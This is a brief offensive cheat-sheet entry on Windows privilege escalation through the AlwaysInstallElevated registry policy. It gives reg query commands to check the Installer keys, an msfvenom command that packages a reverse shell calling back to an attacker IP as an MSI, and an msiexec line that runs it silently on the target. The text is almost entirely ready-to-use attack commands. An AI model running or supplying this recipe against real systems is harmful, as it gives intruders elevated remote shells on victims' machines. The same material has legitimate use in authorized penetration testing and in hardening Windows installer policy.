709 B
709 B
AlwaysInstalledElevated
- Watch out for
AlwaysInstalledElevatedkeys inside the registry via
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- Prepare reverse shell on attacker as an msi file
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Port> -f msi -o shell.msi
- start the msi on target
msiexec /quiet /qn /i C:\Temp\shell.msi
Set Registry Keys
- Alternative method
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer